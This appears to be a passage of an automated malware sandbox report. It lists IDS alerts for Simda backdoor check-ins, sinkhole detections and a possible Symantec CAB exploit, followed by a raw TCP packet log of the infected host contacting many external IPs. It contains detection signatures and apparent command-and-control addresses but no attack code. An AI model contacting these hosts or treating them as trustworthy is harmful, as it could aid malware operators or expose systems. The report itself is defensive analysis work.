                                                                                                                                                                                                          2024-11-11T18:24:06.744166+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84971875.2.71.199443TCP
                                                                                                                                                                                                          2024-11-11T18:24:07.324446+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849706199.191.50.8380TCP
                                                                                                                                                                                                          2024-11-11T18:24:07.933006+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849720188.114.96.3443TCP
                                                                                                                                                                                                          2024-11-11T18:24:08.341643+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849709188.114.96.380TCP
                                                                                                                                                                                                          2024-11-11T18:24:10.021818+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849721188.114.96.3443TCP
                                                                                                                                                                                                          2024-11-11T18:24:10.543538+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84972213.248.169.4880TCP
                                                                                                                                                                                                          2024-11-11T18:24:10.877685+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84972418.208.156.24880TCP
                                                                                                                                                                                                          2024-11-11T18:24:10.883804+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.849724TCP
                                                                                                                                                                                                          2024-11-11T18:24:10.883804+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.849724TCP
                                                                                                                                                                                                          2024-11-11T18:24:10.885259+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.8497253.94.10.3480TCP
                                                                                                                                                                                                          2024-11-11T18:24:11.029523+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849723188.114.97.380TCP
                                                                                                                                                                                                          2024-11-11T18:24:11.403094+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849726103.150.10.4880TCP
                                                                                                                                                                                                          2024-11-11T18:24:12.460365+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849726103.150.10.4880TCP
                                                                                                                                                                                                          2024-11-11T18:24:13.477876+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849727188.114.97.3443TCP
                                                                                                                                                                                                          2024-11-11T18:24:13.833912+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849723188.114.97.380TCP
                                                                                                                                                                                                          2024-11-11T18:24:16.088067+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849729188.114.97.3443TCP
                                                                                                                                                                                                          2024-11-11T18:24:16.605566+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84973076.223.67.18980TCP
                                                                                                                                                                                                          2024-11-11T18:24:16.769592+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84973164.225.91.7380TCP
                                                                                                                                                                                                          2024-11-11T18:24:16.770885+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84973244.221.84.10580TCP
                                                                                                                                                                                                          2024-11-11T18:24:17.039103+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849733103.224.212.21080TCP
                                                                                                                                                                                                          2024-11-11T18:24:17.050761+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849734103.224.182.25280TCP
                                                                                                                                                                                                          2024-11-11T18:24:17.440887+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849735154.85.183.5080TCP
                                                                                                                                                                                                          2024-11-11T18:24:17.731101+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849735154.85.183.5080TCP
                                                                                                                                                                                                          2024-11-11T18:24:18.913088+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84973964.225.91.7380TCP
                                                                                                                                                                                                          2024-11-11T18:24:19.113297+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84974172.52.179.17480TCP
                                                                                                                                                                                                          2024-11-11T18:24:19.426213+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.849738TCP
                                                                                                                                                                                                          2024-11-11T18:24:19.613186+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84974272.52.179.17480TCP
                                                                                                                                                                                                          2024-11-11T18:24:22.641586+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85359852.34.198.22980TCP
                                                                                                                                                                                                          2024-11-11T18:24:22.649459+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz152.34.198.22980192.168.2.853598TCP
                                                                                                                                                                                                          2024-11-11T18:24:22.649459+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst152.34.198.22980192.168.2.853598TCP
                                                                                                                                                                                                          2024-11-11T18:24:25.392786+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85935744.221.84.10580TCP
                                                                                                                                                                                                          2024-11-11T18:24:26.934349+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849711208.100.26.24580TCP
                                                                                                                                                                                                          2024-11-11T18:24:27.365769+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849711208.100.26.24580TCP
                                                                                                                                                                                                          2024-11-11T18:24:27.368088+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.863205199.59.243.22780TCP
                                                                                                                                                                                                          2024-11-11T18:24:27.368144+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86320623.253.46.6480TCP
                                                                                                                                                                                                          2024-11-11T18:24:27.368144+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86320785.17.31.8280TCP
                                                                                                                                                                                                          2024-11-11T18:24:27.403260+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849709188.114.96.380TCP
                                                                                                                                                                                                          2024-11-11T18:24:27.425746+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849707154.212.231.8280TCP
                                                                                                                                                                                                          2024-11-11T18:24:27.462423+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86320875.2.71.19980TCP
                                                                                                                                                                                                          2024-11-11T18:24:27.808784+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86320985.17.31.8280TCP
                                                                                                                                                                                                          2024-11-11T18:24:27.878793+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86321023.253.46.6480TCP
                                                                                                                                                                                                          2024-11-11T18:24:27.912689+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849707154.212.231.8280TCP
                                                                                                                                                                                                          2024-11-11T18:24:28.359758+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86321275.2.71.199443TCP
                                                                                                                                                                                                          2024-11-11T18:24:28.944020+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.863211188.114.96.3443TCP
                                                                                                                                                                                                          2024-11-11T18:24:29.830756+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849709188.114.96.380TCP
                                                                                                                                                                                                          2024-11-11T18:24:31.123927+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.863213188.114.96.3443TCP
                                                                                                                                                                                                          2024-11-11T18:24:31.543636+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849726103.150.10.4880TCP
                                                                                                                                                                                                          2024-11-11T18:24:31.699421+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849723188.114.97.380TCP
                                                                                                                                                                                                          2024-11-11T18:24:32.831483+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849726103.150.10.4880TCP
                                                                                                                                                                                                          2024-11-11T18:24:34.530489+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.861823188.114.97.3443TCP
                                                                                                                                                                                                          2024-11-11T18:24:34.922467+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849723188.114.97.380TCP
                                                                                                                                                                                                          2024-11-11T18:24:36.952023+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.861824188.114.97.3443TCP
                                                                                                                                                                                                          2024-11-11T18:24:37.303197+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849735154.85.183.5080TCP
                                                                                                                                                                                                          2024-11-11T18:24:37.589469+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.861825103.224.182.25280TCP
                                                                                                                                                                                                          2024-11-11T18:24:37.628005+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.861826103.224.212.21080TCP
                                                                                                                                                                                                          2024-11-11T18:24:37.871157+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849735154.85.183.5080TCP
                                                                                                                                                                                                          2024-11-11T18:24:39.913696+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86483072.52.179.17480TCP
                                                                                                                                                                                                          2024-11-11T18:24:40.447338+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84931272.52.179.17480TCP
                                                                                                                                                                                                          2024-11-11T18:24:56.419947+01002021022ET MALWARE Wapack Labs Sinkhole DNS Reply11.1.1.153192.168.2.855775UDP
                                                                                                                                                                                                          2024-11-11T18:25:04.870772+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.862057TCP
                                                                                                                                                                                                          2024-11-11T18:25:05.332951+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.862047199.191.50.8380TCP
                                                                                                                                                                                                          2024-11-11T18:25:54.329448+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85352085.17.31.8280TCP
                                                                                                                                                                                                          2024-11-11T18:25:54.352111+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853521199.59.243.22780TCP
                                                                                                                                                                                                          2024-11-11T18:25:54.360416+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853519208.100.26.24580TCP
                                                                                                                                                                                                          2024-11-11T18:25:54.378278+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85352223.253.46.6480TCP
                                                                                                                                                                                                          2024-11-11T18:25:54.385974+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85352675.2.71.19980TCP
                                                                                                                                                                                                          2024-11-11T18:25:54.576801+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853519208.100.26.24580TCP
                                                                                                                                                                                                          2024-11-11T18:25:54.823609+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853523154.212.231.8280TCP
                                                                                                                                                                                                          2024-11-11T18:25:54.888954+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85353023.253.46.6480TCP
                                                                                                                                                                                                          2024-11-11T18:25:55.030079+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85352785.17.31.8280TCP
                                                                                                                                                                                                          2024-11-11T18:25:55.151694+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85353175.2.71.199443TCP
                                                                                                                                                                                                          2024-11-11T18:25:55.202595+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853523154.212.231.8280TCP
                                                                                                                                                                                                          2024-11-11T18:25:55.335714+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853524188.114.96.380TCP
                                                                                                                                                                                                          2024-11-11T18:25:56.561549+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853540188.114.96.3443TCP
                                                                                                                                                                                                          2024-11-11T18:25:57.002925+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853524188.114.96.380TCP
                                                                                                                                                                                                          2024-11-11T18:25:58.211626+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853543188.114.96.3443TCP
                                                                                                                                                                                                          2024-11-11T18:25:58.781074+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.8535453.94.10.3480TCP
                                                                                                                                                                                                          2024-11-11T18:25:58.891700+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85354613.248.169.4880TCP
                                                                                                                                                                                                          2024-11-11T18:25:58.996976+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85354718.208.156.24880TCP
                                                                                                                                                                                                          2024-11-11T18:25:59.018402+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853544188.114.96.380TCP
                                                                                                                                                                                                          2024-11-11T18:25:59.709522+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853548103.150.10.4880TCP
                                                                                                                                                                                                          2024-11-11T18:26:00.942488+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853549188.114.96.3443TCP
                                                                                                                                                                                                          2024-11-11T18:26:01.317843+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853551103.150.10.4880TCP
                                                                                                                                                                                                          2024-11-11T18:26:01.737331+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853552188.114.96.380TCP
                                                                                                                                                                                                          2024-11-11T18:26:03.622314+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853554188.114.96.3443TCP
                                                                                                                                                                                                          2024-11-11T18:26:04.267660+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85355676.223.67.18980TCP
                                                                                                                                                                                                          2024-11-11T18:26:04.274948+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85355564.225.91.7380TCP
                                                                                                                                                                                                          2024-11-11T18:26:04.455826+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853557103.224.182.25280TCP
                                                                                                                                                                                                          2024-11-11T18:26:04.481004+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85797144.221.84.10580TCP
                                                                                                                                                                                                          2024-11-11T18:26:04.548250+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.857970103.224.212.21080TCP
                                                                                                                                                                                                          2024-11-11T18:26:04.993727+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.857972154.85.183.5080TCP
                                                                                                                                                                                                          2024-11-11T18:26:05.281399+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.857972154.85.183.5080TCP

                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.828895092 CET4970580192.168.2.818.208.156.248
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.833765984 CET804970518.208.156.248192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.833849907 CET4970580192.168.2.818.208.156.248
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.847726107 CET4970580192.168.2.818.208.156.248
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.852799892 CET804970518.208.156.248192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.926788092 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.931804895 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.931879044 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.932044029 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.936903954 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.951186895 CET4970780192.168.2.8154.212.231.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.955965042 CET8049707154.212.231.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.956048012 CET4970780192.168.2.8154.212.231.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.956163883 CET4970780192.168.2.8154.212.231.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.961071014 CET8049707154.212.231.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.973658085 CET4970880192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.978511095 CET804970823.253.46.64192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.978579044 CET4970880192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.978677034 CET4970880192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.983725071 CET804970823.253.46.64192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.040128946 CET4970980192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.045106888 CET8049709188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.045182943 CET4970980192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.045310020 CET4970980192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.050509930 CET8049709188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.121397972 CET4971080192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.126312971 CET8049710199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.126389980 CET4971080192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.126470089 CET4971080192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.131341934 CET8049710199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.142221928 CET4971180192.168.2.8208.100.26.245
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.147052050 CET8049711208.100.26.245192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.147106886 CET4971180192.168.2.8208.100.26.245
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.147332907 CET4971180192.168.2.8208.100.26.245
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.147510052 CET4971280192.168.2.83.94.10.34
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.149569988 CET4971380192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.152225018 CET8049711208.100.26.245192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.152378082 CET80497123.94.10.34192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.152434111 CET4971280192.168.2.83.94.10.34
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.152641058 CET4971280192.168.2.83.94.10.34
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.152714014 CET4971480192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.154437065 CET804971375.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.154499054 CET4971580192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.154535055 CET4971380192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.154633999 CET4971380192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.157561064 CET80497123.94.10.34192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.157581091 CET804971444.221.84.105192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.157660961 CET4971480192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.159331083 CET804971544.221.84.105192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.159403086 CET4971580192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.159446001 CET804971375.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.159543991 CET4971580192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.162389040 CET4971480192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.164469004 CET804971544.221.84.105192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.167232990 CET804971444.221.84.105192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.285598993 CET804970518.208.156.248192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.285685062 CET4970580192.168.2.818.208.156.248
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.290652990 CET4970580192.168.2.818.208.156.248
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.292653084 CET804970518.208.156.248192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.292728901 CET4970580192.168.2.818.208.156.248
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.295595884 CET804970518.208.156.248192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.431714058 CET804970823.253.46.64192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.431780100 CET4970880192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.432348967 CET804970823.253.46.64192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.432398081 CET4970880192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.432857990 CET4970880192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.432889938 CET4970880192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.437999010 CET804970823.253.46.64192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.438050032 CET4970880192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.441229105 CET4971680192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.446242094 CET804971623.253.46.64192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.446321964 CET4971680192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.446527958 CET4971680192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.451524019 CET804971623.253.46.64192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.478410959 CET4971780192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.483274937 CET804971785.17.31.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.483364105 CET4971780192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.483501911 CET4971780192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.488323927 CET804971785.17.31.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.552552938 CET8049710199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.552577019 CET8049710199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.552640915 CET4971080192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.579682112 CET80497123.94.10.34192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.579737902 CET4971280192.168.2.83.94.10.34
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.580854893 CET804971375.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.580931902 CET4971380192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.582390070 CET4971280192.168.2.83.94.10.34
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.583679914 CET4971380192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.585838079 CET804971544.221.84.105192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.585920095 CET4971580192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.586096048 CET804971444.221.84.105192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.586456060 CET4971480192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.586517096 CET804971375.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.586577892 CET4971380192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.586776972 CET80497123.94.10.34192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.586829901 CET4971280192.168.2.83.94.10.34
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.587277889 CET80497123.94.10.34192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.588709116 CET804971375.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.593017101 CET804971544.221.84.105192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.594953060 CET804971444.221.84.105192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.595041037 CET4971580192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.595957994 CET4971480192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.597573996 CET8049711208.100.26.245192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.597685099 CET4971180192.168.2.8208.100.26.245
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.600636005 CET4971580192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.601814032 CET4971480192.168.2.844.221.84.105
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.605489969 CET804971544.221.84.105192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.606056929 CET4971180192.168.2.8208.100.26.245
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.606761932 CET804971444.221.84.105192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.610939980 CET8049711208.100.26.245192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.612076998 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.612123013 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.612184048 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.641027927 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.641058922 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.709156990 CET8049711208.100.26.245192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.709220886 CET4971180192.168.2.8208.100.26.245
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.876477003 CET8049707154.212.231.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.876538038 CET4970780192.168.2.8154.212.231.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.890208960 CET4970780192.168.2.8154.212.231.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.894268036 CET804971785.17.31.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.894705057 CET4971780192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.894824982 CET4971780192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.895023108 CET8049707154.212.231.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.895884991 CET4971980192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.899446011 CET804971623.253.46.64192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.899509907 CET4971680192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.899545908 CET804971623.253.46.64192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.899579048 CET4971680192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.899662971 CET804971785.17.31.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.899868011 CET4971680192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.899892092 CET4971680192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.901776075 CET804971985.17.31.82192.168.2.8
